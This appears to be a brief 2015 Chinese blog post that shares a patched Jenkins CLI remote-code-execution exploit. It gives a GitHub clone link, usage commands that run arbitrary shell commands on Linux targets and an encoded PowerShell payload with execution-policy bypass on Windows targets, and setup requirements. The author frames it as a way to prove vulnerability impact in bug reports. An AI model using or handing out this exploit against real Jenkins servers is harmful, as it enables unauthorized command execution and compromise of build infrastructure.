提交漏洞总是要证明漏洞危害,老外写的java代码又有bug,所以随手改掉了
点击这里下载代码,或者使用如下命令
git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git
来张截图吧,
工具的具体使用方法,
如果目标是 Linux、Mac 机器,请使用,
./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
如果是 Windows 机器,
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'
环境要求,
- 确保你安装了 java、perl
- 确保你安装了 IPC::Run 这个PERL模块,安装方法为
cpan IPC::Run
编写于 November 15, 2015